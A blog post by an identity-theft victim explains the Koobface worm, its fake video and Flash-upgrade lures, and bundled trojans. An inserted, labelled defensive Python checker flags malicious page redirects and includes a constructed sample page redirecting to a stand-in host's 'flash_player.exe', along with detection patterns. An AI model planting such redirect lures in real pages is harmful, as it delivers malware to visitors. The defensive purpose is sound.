KOOBFACE

I got a text message from one of my best friends this morning saying that I should warn my friends on Facebook about a virus, and also not to open any emails from her that would prompt me to watch a video.

That didn’t sound right, so I called her later that day. Last week, before she left for a short Thanksgiving vacation, she got an email from one of her Facebook friends which said “Youur ccute ass is on our new video nowjj” or something like that. Unsuspecting, she followed the link, but nothing opened. She didn’t think twice about it. While she was on vacation, she started getting emails from her friends basically yelling at her: What are you sending us? You are sending us a virus! Stop!

When my wonderful friend opened that email from her Facebook friend and tried to download and watch the video, she instead installed, unknowingly of course, a computer worm called Koobface, which is an anagram of Facebook.

Koobface was discovered over a year ago. It is sometimes referred to as the “Facebook Virus” because at first it targeted Facebook users, but it now targets about eight different social networking sites, including MySpace, Twitter, Bebo, Friendster, etc. The ultimate goal of this worm is to gather sensitive information such as credit card numbers, passwords, banking information, and login details for any other social networking site. It also turns the infected computer into a zombie that forms part of a botnet, which means it will send itself via email to all of the contacts saved in your address book. It may also start automatically posting comments on your Facebook friends’ profiles with links to the video.

Koobface has evolved since it was first discovered and has many variants and components. It is a very sophisticated worm and distributes itself in various ways. You may get an email from a friend asking you to open and watch a video; the worm then quietly downloads itself in the background, and you won’t even notice. Or you may be taken to a third-party website that looks like a genuine video sharing site such as YouTube, complete with a picture of the Facebook friend whose email you received. You may then be prompted to upgrade your Adobe Flash Player, but the “upgrade” is just a download link for the worm. Another Koobface component can register a new Facebook account and confirm an email address in Gmail in order to activate the newly registered account. It will randomly join groups, add new friends and make posts on Facebook friends’ walls. Not only that, those accounts are very well designed and even have photos, favorite songs, books and interests listed on the profile.

Another variant of Koobface can set up fake blogs and populate them with links to the latest news taken from Google news feeds. Those blogs contain a script that redirects the visitor to a malicious site that tries to install the worm.
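The post describes fake blogs that carry a script redirecting visitors to a site that pushes the worm, and earlier a fake Flash Player “upgrade” that is really a download link. As an added example that is not part of the original post and not code from any of the sources it cites, here is a small Python check a defender could run over a fetched page to flag that pattern: it finds meta-refresh redirects and the common JavaScript location assignments, and reports any that point off the page’s own host or at an executable download. The hostnames and the HTML sample are constructed for the illustration and are not indicators from any real campaign.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page imitating a fake "news blog" of the kind the post
# describes. Hostnames are hypothetical, not real Koobface infrastructure.
SAMPLE_BLOG_HTML = """<html><head>
<title>Latest headlines</title>
<meta http-equiv="refresh" content="0; url=http://video-update.example/flash_player.exe">
<script>window.location = "http://video-update.example/watch?v=1";</script>
</head><body>
<p>Read the latest news: <a href="http://news.example/story">story</a></p>
</body></html>"""

# "0; url=http://..." inside a meta refresh content attribute
META_URL_RE = re.compile(r"url\s*=\s*['\"]?([^'\" >;]+)", re.I)

# window.location = "...", document.location.href = "...", location.replace("...")
# The (?!=) keeps plain comparisons like `location == "x"` from matching.
JS_REDIRECT_RE = re.compile(
    r"(?:window|document|top|self)\.location(?:\.href)?\s*=(?!=)\s*['\"]([^'\"]+)['\"]"
    r"|location\.(?:replace|assign)\(\s*['\"]([^'\"]+)['\"]\s*\)",
    re.I,
)

# File extensions that should never be the target of an automatic redirect
EXECUTABLE_SUFFIXES = (".exe", ".scr", ".pif", ".bat")


class RedirectFinder(HTMLParser):
    """Collects (mechanism, target) pairs for every redirect found in a page."""

    def __init__(self):
        super().__init__()
        self.redirects = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lowercases attribute names for us
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = META_URL_RE.search(a.get("content") or "")
            if m:
                self.redirects.append(("meta-refresh", m.group(1)))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies are delivered here as raw text (CDATA handling)
        if self._in_script:
            for m in JS_REDIRECT_RE.finditer(data):
                self.redirects.append(("javascript", m.group(1) or m.group(2)))


def find_redirects(html):
    """Return all redirects in the page as (mechanism, target) tuples."""
    parser = RedirectFinder()
    parser.feed(html)
    parser.close()
    return parser.redirects


def suspicious_redirects(html, page_host):
    """Flag redirects that leave the page's host or point at an executable.

    A relative target (no hostname) is treated as staying on page_host.
    """
    findings = []
    for mechanism, target in find_redirects(html):
        parsed = urlparse(target)
        host = parsed.hostname or page_host
        off_site = host.lower() != page_host.lower()
        executable = parsed.path.lower().endswith(EXECUTABLE_SUFFIXES)
        if off_site or executable:
            findings.append({
                "mechanism": mechanism,
                "target": target,
                "off_site": off_site,
                "executable": executable,
            })
    return findings


if __name__ == "__main__":
    for f in suspicious_redirects(SAMPLE_BLOG_HTML, "news-blog.example"):
        print(f)
```

The check is deliberately narrow: it only reads the page source, so obfuscated or dynamically built redirect code will not be caught, and a legitimate blog may redirect off-site for good reasons. Treat a hit as a reason to look closer, not as proof of infection.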

When your system gets infected with Koobface, it may be infected by other malicious software as well; sometimes you get a bundle of all kinds of bad stuff. According to a report by TrendMicro, Koobface is monetizing itself through a pay-per-install model: other malware groups pay the Koobface group to install their own malicious software on Koobface-infected systems. In my friend’s case, in addition to Koobface, Virtumonde (aka Vundo or VundoTrojan) and Mal/Tinydl were installed.

Virtumonde is a Trojan horse designed to create pop-up windows and advertisements for rogue antispyware programs. Mal/Tinydl is a Trojan downloader; it creates backdoors so that more malware can be downloaded and installed on the infected system.

Since I am not an expert on how to remove Koobface, I can’t really tell you what to do step-by-step, but there are tools available for Koobface removal.

If you know more about this subject and want to add your opinion and knowledge, please leave a comment or email me and I will make sure to have updated information posted.

What I am going to suggest, though, if it happened to you, is to call your bank and notify them of the incident, close your account and open a new one, call one or all of the credit reporting agencies and place an initial fraud alert, cancel your credit cards and monitor your credit file for any unusual activities.

References:

Wikipedia

TrendMicro

Finjan.com

ReadWriteWeb.com

About the Author

Lana is a real life Identity Theft Victim. Identity Theft Manifesto is a result of her own struggles to clear her credit, her name and reputation. She is on the mission to research, learn more and educate her readers about ID Theft Crime.